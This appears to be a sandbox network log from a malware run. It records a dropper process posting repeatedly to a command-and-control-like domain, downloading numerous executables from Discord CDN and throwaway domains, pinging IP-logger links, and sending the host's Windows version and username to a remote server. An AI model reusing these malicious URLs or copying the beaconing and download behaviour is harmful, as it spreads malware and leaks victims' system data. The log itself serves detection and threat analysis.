Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 0
Retry-After: 33
X-RateLimit-Reset: 1620236186
Date: Wed, 05 May 2021 17:35:53 GMT
POST

http://reportyuwt4sbackv97qarke3.com/sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC

SHyqaefepynae.exe

Remote address:

162.0.220.187:80

Request

POST /sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: reportyuwt4sbackv97qarke3.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 429 Too Many Requests

Server: nginx/1.20.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 0
Retry-After: 11
X-RateLimit-Reset: 1620236186
Date: Wed, 05 May 2021 17:36:15 GMT
POST

http://reportyuwt4sbackv97qarke3.com/sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC

SHyqaefepynae.exe

Remote address:

162.0.220.187:80

Request

POST /sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: reportyuwt4sbackv97qarke3.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.20.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 50
Date: Wed, 05 May 2021 17:36:53 GMT
DNS

kiff.store

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

kiff.store

IN A

Response

kiff.store

IN A

185.154.14.180
GET

https://kiff.store/builds/KiffMainE1.exe

SHyqaefepynae.exe

Remote address:

185.154.14.180:443

Request

GET /builds/KiffMainE1.exe HTTP/1.1
Host: kiff.store
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:23 GMT
Content-Type: application/octet-stream
Content-Length: 69120
Last-Modified: Fri, 30 Apr 2021 04:47:48 GMT
Connection: keep-alive
Keep-Alive: timeout=60
ETag: "608b8bf4-10e00"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes
DNS

alnasarlab.com

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

alnasarlab.com

IN A

Response

alnasarlab.com

IN A

192.232.251.33
GET

https://alnasarlab.com/download/download.exe

SHyqaefepynae.exe

Remote address:

192.232.251.33:443

Request

GET /download/download.exe HTTP/1.1
Host: alnasarlab.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:24 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Sun, 25 Apr 2021 09:12:29 GMT
Accept-Ranges: bytes
Content-Length: 325632
content-Security-Policy: upgrade-insecure-requests
Keep-Alive: timeout=5, max=75
Content-Type: application/x-msdownload
DNS

cdn.discordapp.com

5229.exe

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.133.233
DNS

www.facebook.com

5229.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.201.35
GET

https://cdn.discordapp.com/attachments/829885245049667597/836530399470682112/001.exe

SHyqaefepynae.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/829885245049667597/836530399470682112/001.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:24 GMT
Content-Type: application/x-msdos-program
Content-Length: 163840
Connection: keep-alive
Set-Cookie: __cfduid=d273e2c78caaa6341d207598e919575811620236124; expires=Fri, 04-Jun-21 17:35:24 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 64abb9a3bd059d5a-AMS
Accept-Ranges: bytes
Age: 711106
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=001.exe
ETag: "fa8dd39e54418c81ef4c7f624012557c"
Expires: Thu, 05 May 2022 17:35:24 GMT
Last-Modified: Tue, 27 Apr 2021 09:13:09 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 09df325a5500009d5a09b58000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1619514789252824
x-goog-hash: crc32c=WR4ynA==
x-goog-hash: md5=+o3TnlRBjIHvTH9iQBJVfA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 163840
X-GUploader-UploadID: ABg5-UwN9erK4oWHQpcMPONJJGIiTfC9n0jcsuQFmHvOKoyJx3vyzMbYNz6HY9_CdUAxV1Yoba0dwF7pOPNddTVWfyJNsmpmoQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Mvp0zUbIyRHi7pQujF6lIfC8OR8LCGq4Yi2i4gwdcgcqgDApen6n4fyYhyDG3rP%2B0%2BAf%2FppDe2GeLCAhHBgMLu51JNqVP3VkYJfzxjcTpd1kFFU%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
GET

https://cdn.discordapp.com/attachments/826897158568804390/838347460681924648/setup.exe

SHyqaefepynae.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/826897158568804390/838347460681924648/setup.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:39 GMT
Content-Type: application/x-msdos-program
Content-Length: 721408
Connection: keep-alive
Set-Cookie: __cfduid=dfaa755e94a972c86672677b8e7fd27411620236139; expires=Fri, 04-Jun-21 17:35:39 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 64abba019b1a9d5a-AMS
Accept-Ranges: bytes
Age: 280676
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=setup.exe
ETag: "a2e98e2a9a2a80081d0083e4e24d2705"
Expires: Thu, 05 May 2022 17:35:39 GMT
Last-Modified: Sun, 02 May 2021 09:33:30 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 09df32950200009d5af51ff000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1619948010430303
x-goog-hash: crc32c=OoEjug==
x-goog-hash: md5=oumOKpoqgAgdAIPk4k0nBQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 721408
X-GUploader-UploadID: ABg5-Uy9CcNQCEfKJ93_cIbmoAyAaNfrt__Xttnxyvx-CqJJH7k6tTJZ6AFjSvZDcS014Hwq1-SbfJxonqdINeWmXRdFz4ERFA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YOJ6Y7PpWgclB52mrb%2FdkGln5ebQqsnOJlDTD1%2BDnWDRujnBYRUiuoH1izb%2FoIhb1U6PH%2Ft36uKqB%2FJ3%2BVixPHotPDo%2BkCJw%2FM0MMRuFQuKhuQs%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
GET

https://cdn.discordapp.com/attachments/829885245049667597/836530528240009226/005.exe

SHyqaefepynae.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/829885245049667597/836530528240009226/005.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:49 GMT
Content-Type: application/x-msdos-program
Content-Length: 163840
Connection: keep-alive
Set-Cookie: __cfduid=d5c968e1f89a0d28e569c25e673c030711620236149; expires=Fri, 04-Jun-21 17:35:49 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 64abba3b8a3c9d5a-AMS
Accept-Ranges: bytes
Age: 711081
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=005.exe
ETag: "0422002ffd305cccc4e8ab7fc54fd02b"
Expires: Thu, 05 May 2022 17:35:49 GMT
Last-Modified: Tue, 27 Apr 2021 09:13:39 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 09df32b93900009d5a240f1000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1619514819955445
x-goog-hash: crc32c=o+uoXg==
x-goog-hash: md5=BCIAL/0wXMzE6Kt/xU/QKw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 163840
X-GUploader-UploadID: ABg5-UyOU_RqCvwxPTeEJzEAXO5ZryCImBVbSjEcLktPf3eoKWGHRsBRcBz5sLFR19sf52D526tigotjq_-QpI9xyDF8j9cVkw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FYMJ00Vaa%2B5k7qyH2QVj1WJm3gyNO9SV8Z0ldnbgX7snh0ZHp1UzoSQ3MiBphv9zmqRMhMVZTFx8cEbeC1AWdA4CrB6mdgHYURW%2FhpaNHulALHo%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
GET

https://cdn.discordapp.com/attachments/829886688229720096/829887075062120458/inst.exe

SHyqaefepynae.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/829886688229720096/829887075062120458/inst.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:49 GMT
Content-Type: application/x-msdos-program
Content-Length: 159744
Connection: keep-alive
Set-Cookie: __cfduid=d5c968e1f89a0d28e569c25e673c030711620236149; expires=Fri, 04-Jun-21 17:35:49 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 64abba413e149d5a-AMS
Accept-Ranges: bytes
Age: 1080477
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=inst.exe
ETag: "758f916f408d408a20a727a4b42b8a58"
Expires: Thu, 05 May 2022 17:35:49 GMT
Last-Modified: Fri, 09 Apr 2021 01:14:57 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 09df32bcc100009d5af8bd6000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617930897287664
x-goog-hash: crc32c=VUpNCA==
x-goog-hash: md5=dY+Rb0CNQIogpyektCuKWA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 159744
X-GUploader-UploadID: ABg5-Uz8UMGFo4R7aJKFLLrSWTn9DTgHyVJbj8roYd0QxGz_V3Ae1O8Yhb_lCJrKSAW1SQL7grZyuwdQo3vUuXRUdhSsMf8wYw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=L0RwHjHPLYYUAc5ZulwIxkakymGTadtEC5W5Skw34oYUModjDR5H8%2FJRmIVTaspLVI5gkRTWs0I7UOc%2BjARs6R4orH%2F2fXmcPWumki5yGq%2B2fow%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
GET

https://iplogger.org/ru/logger/rkshy9256xK5/

SHyqaefepynae.exe

Remote address:

88.99.66.31:443

Request

GET /ru/logger/rkshy9256xK5/ HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=qdmh4407ohp8uvr7oe3hu7uqm2; path=/; HttpOnly
Pragma: no-cache
Access-Control-Allow-Origin: *
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: zlang=ru; expires=Sun, 04-Jul-2021 17:35:25 GMT; Max-Age=5184000; path=/; domain=.iplogger.org; secure; HttpOnly
Set-Cookie: auth_code=NO_AUTH; expires=Sun, 04-Jul-2021 17:35:25 GMT; Max-Age=5184000; path=/; domain=.iplogger.org; secure; HttpOnly
Set-Cookie: eid=rkshy9256xK5; expires=Sun, 04-Jul-2021 17:35:25 GMT; Max-Age=5184000; path=/; domain=.iplogger.org; secure; HttpOnly
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET

https://iplogger.org/ru/logger/tah5t72ZdkR9/

SHyqaefepynae.exe

Remote address:

88.99.66.31:443

Request

GET /ru/logger/tah5t72ZdkR9/ HTTP/1.1
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=3r8igiqtd0nvm57lhc8me3dqs6; path=/; HttpOnly
Pragma: no-cache
Access-Control-Allow-Origin: *
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: zlang=ru; expires=Sun, 04-Jul-2021 17:35:37 GMT; Max-Age=5184000; path=/; domain=.iplogger.org; secure; HttpOnly
Set-Cookie: auth_code=NO_AUTH; expires=Sun, 04-Jul-2021 17:35:37 GMT; Max-Age=5184000; path=/; domain=.iplogger.org; secure; HttpOnly
Set-Cookie: eid=tah5t72ZdkR9; expires=Sun, 04-Jul-2021 17:35:37 GMT; Max-Age=5184000; path=/; domain=.iplogger.org; secure; HttpOnly
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
DNS

d.jumpstreetboys.com

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

d.jumpstreetboys.com

IN A

Response

d.jumpstreetboys.com

IN A

172.67.222.38

d.jumpstreetboys.com

IN A

104.21.62.88
GET

https://d.jumpstreetboys.com/v2Y/installer.exe

SHyqaefepynae.exe

Remote address:

172.67.222.38:443

Request

GET /v2Y/installer.exe HTTP/1.1
Host: d.jumpstreetboys.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:25 GMT
Content-Type: application/octet-stream
Content-Length: 3616056
Connection: keep-alive
Set-Cookie: __cfduid=d12463275eda06166dd1d5a0c65ad1a9f1620236125; expires=Fri, 04-Jun-21 17:35:25 GMT; path=/; domain=.jumpstreetboys.com; HttpOnly; SameSite=Lax
Last-Modified: Fri, 30 Apr 2021 05:54:32 GMT
ETag: "608b9b98-372d38"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 09df325d0100004c6702069000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Dox3vXkS8d0SU00Vj1fMDBR2dLoYmg2zPn7e%2BKqHTyIEql%2BbTKpiBFPwfrkC%2F4jxJ8hWW1a0q%2FQ1M%2BBbF2xCqJYFPj4TppdNpc4iCqQbsPrEfElg6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 64abb9a7fd274c67-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
POST

http://reportyuwt4sbackv97qarke3.com/sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC

SHyqaefepynae.exe

Remote address:

162.0.220.187:80

Request

POST /sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: reportyuwt4sbackv97qarke3.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.20.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 2
Date: Wed, 05 May 2021 17:35:26 GMT
POST

http://reportyuwt4sbackv97qarke3.com/sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC

SHyqaefepynae.exe

Remote address:

162.0.220.187:80

Request

POST /sCTMqVJusfff2DEP/eYzrrbN8esV7bvgC HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: reportyuwt4sbackv97qarke3.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip

Response

HTTP/1.1 429 Too Many Requests

Server: nginx/1.20.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 0
Retry-After: 47
X-RateLimit-Reset: 1620236186
Date: Wed, 05 May 2021 17:35:39 GMT
DNS

f.uaalgee33.com

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

f.uaalgee33.com

IN A

Response

f.uaalgee33.com

IN A

172.67.152.52

f.uaalgee33.com

IN A

104.21.80.171
GET

http://f.uaalgee33.com/ww/gaoou.exe

SHyqaefepynae.exe

Remote address:

172.67.152.52:80

Request

GET /ww/gaoou.exe HTTP/1.1
Host: f.uaalgee33.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:27 GMT
Content-Type: application/octet-stream
Content-Length: 999424
Connection: keep-alive
Set-Cookie: __cfduid=db70545429bd5da42e5e013146d4cf6071620236126; expires=Fri, 04-Jun-21 17:35:26 GMT; path=/; domain=.uaalgee33.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 12 Apr 2021 12:18:25 GMT
ETag: "60743a91-f4000"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 09df3261e00000008b1931c000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9AxJtes64YXO1XQeW0dsQyTySrqeg6h3e5VEtUFjLwxxKdCZsld2eaTN8nCHcXXxax2S%2B0XPICyPlPvgLiQnDQcR6atxihavQlVA%2FbKbODk%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 64abb9afc85a008b-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
DNS

noteach.tech

Conhost.exe

Remote address:

8.8.8.8:53

Request

noteach.tech

IN A

Response

noteach.tech

IN A

212.86.114.14
GET

https://noteach.tech/software.php?client=client1

Conhost.exe

Remote address:

212.86.114.14:443

Request

GET /software.php?client=client1 HTTP/1.1
Host: noteach.tech
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 3
Connection: keep-alive
Keep-Alive: timeout=60
GET

https://noteach.tech/add.php?windows=Microsoft%20Windows%2010%20Enterprise&username=GFBFPSXA/Admin&client=client1&region=EU1

Conhost.exe

Remote address:

212.86.114.14:443

Request

GET /add.php?windows=Microsoft%20Windows%2010%20Enterprise&username=GFBFPSXA/Admin&client=client1&region=EU1 HTTP/1.1
Host: noteach.tech

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=60
DNS

www.profitabletrustednetwork.com

Remote address:

8.8.8.8:53

Request

www.profitabletrustednetwork.com

IN A

Response

www.profitabletrustednetwork.com

IN A

192.243.59.20

www.profitabletrustednetwork.com

IN A

192.243.59.12

www.profitabletrustednetwork.com

IN A

192.243.59.13
DNS

g-clean.in

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

g-clean.in

IN A

Response

g-clean.in

IN A

34.95.37.237
GET

http://g-clean.in/download.php?pub=four

SHyqaefepynae.exe

Remote address:

34.95.37.237:80

Request

GET /download.php?pub=four HTTP/1.1
Host: g-clean.in
Connection: Keep-Alive

Response

HTTP/1.0 503 Service Unavailable

Cache-Control: no-cache
Connection: close
Content-Type: text/html
GET

http://g-clean.in/download.php?pub=four

SHyqaefepynae.exe

Remote address:

34.95.37.237:80

Request

GET /download.php?pub=four HTTP/1.1
Content-Type: application/octet-stream
Host: g-clean.in
Connection: Keep-Alive

Response

HTTP/1.0 503 Service Unavailable

Cache-Control: no-cache
Connection: close
Content-Type: text/html
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

google.diragame.com

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

google.diragame.com

IN A

Response

google.diragame.com

IN A

104.21.31.94

google.diragame.com

IN A

172.67.176.44
GET

https://google.diragame.com/userf/25/google-game.exe

SHyqaefepynae.exe

Remote address:

104.21.31.94:443

Request

GET /userf/25/google-game.exe HTTP/1.1
Host: google.diragame.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Date: Wed, 05 May 2021 17:35:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d4c9577c6bbffeea2902c2c81daf8bd0d1620236129; expires=Fri, 04-Jun-21 17:35:29 GMT; path=/; domain=.diragame.com; HttpOnly; SameSite=Lax
Location: https://b.dircgame.live/userf/25/325843825a2745a2a8f9b9e3355cb864.exe
CF-Cache-Status: DYNAMIC
cf-request-id: 09df326c4600000b6bd714f000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=k%2BQZc%2FmT1TPOsq5tG9%2BHh%2FukWmq05f41dxyBWQv8JNaIYDPB7axIPkpNCMiG38Uyd1THtg67wQqpxiZjJgqRKdM5Sm3SEj5CXxWt3hUVgd1A9wlc"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 64abb9c06d9b0b6b-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
DNS

ip-api.com

SystemNetworkService

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

b.dircgame.live

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

b.dircgame.live

IN A

Response

b.dircgame.live

IN A

104.21.78.236

b.dircgame.live

IN A

172.67.138.108
GET

https://b.dircgame.live/userf/25/325843825a2745a2a8f9b9e3355cb864.exe

SHyqaefepynae.exe

Remote address:

104.21.78.236:443

Request

GET /userf/25/325843825a2745a2a8f9b9e3355cb864.exe HTTP/1.1
Host: b.dircgame.live
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:30 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=de3df3b42ae296f7d04e2e6dcb29b35191620236130; expires=Fri, 04-Jun-21 17:35:30 GMT; path=/; domain=.dircgame.live; HttpOnly; SameSite=Lax
Content-Disposition: attachment; filename="wangb.exe"
Content-Transfer-Encoding: binary
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 09df326eeb000000fc9f8d1000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=N6ZGzGSXbkqjsOu2iT40vYgphSN4Wai5LHS6EDitPlx41MwTjiKh3IiHetjqA39bWqgOtMwna7L6JDTpIKofUb0OIilmMMDlClz08UzcsLY%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 64abb9c4ad4000fc-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

http://ip-api.com/json/

gpooe.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:29 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 323
Access-Control-Allow-Origin: *
X-Ttl: 55
X-Rl: 25
DNS

weirdtrendz.com

svchost.exe

Remote address:

8.8.8.8:53

Request

weirdtrendz.com

IN A

Response

weirdtrendz.com

IN A

95.217.40.222
POST

http://weirdtrendz.com/6.jpg

svchost.exe

Remote address:

95.217.40.222:80

Request

POST /6.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: weirdtrendz.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:30 GMT
Server: Apache
Last-Modified: Thu, 06 Jun 2019 05:01:52 GMT
Accept-Ranges: bytes
Content-Length: 144848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
POST

http://weirdtrendz.com/1.jpg

svchost.exe

Remote address:

95.217.40.222:80

Request

POST /1.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: weirdtrendz.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:30 GMT
Server: Apache
Last-Modified: Sun, 06 Aug 2017 20:52:20 GMT
Accept-Ranges: bytes
Content-Length: 645592
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/jpeg
POST

http://weirdtrendz.com/2.jpg

svchost.exe

Remote address:

95.217.40.222:80

Request

POST /2.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: weirdtrendz.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:30 GMT
Server: Apache
Last-Modified: Thu, 06 Jun 2019 05:00:58 GMT
Accept-Ranges: bytes
Content-Length: 334288
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/jpeg
POST

http://weirdtrendz.com/3.jpg

svchost.exe

Remote address:

95.217.40.222:80

Request

POST /3.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: weirdtrendz.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

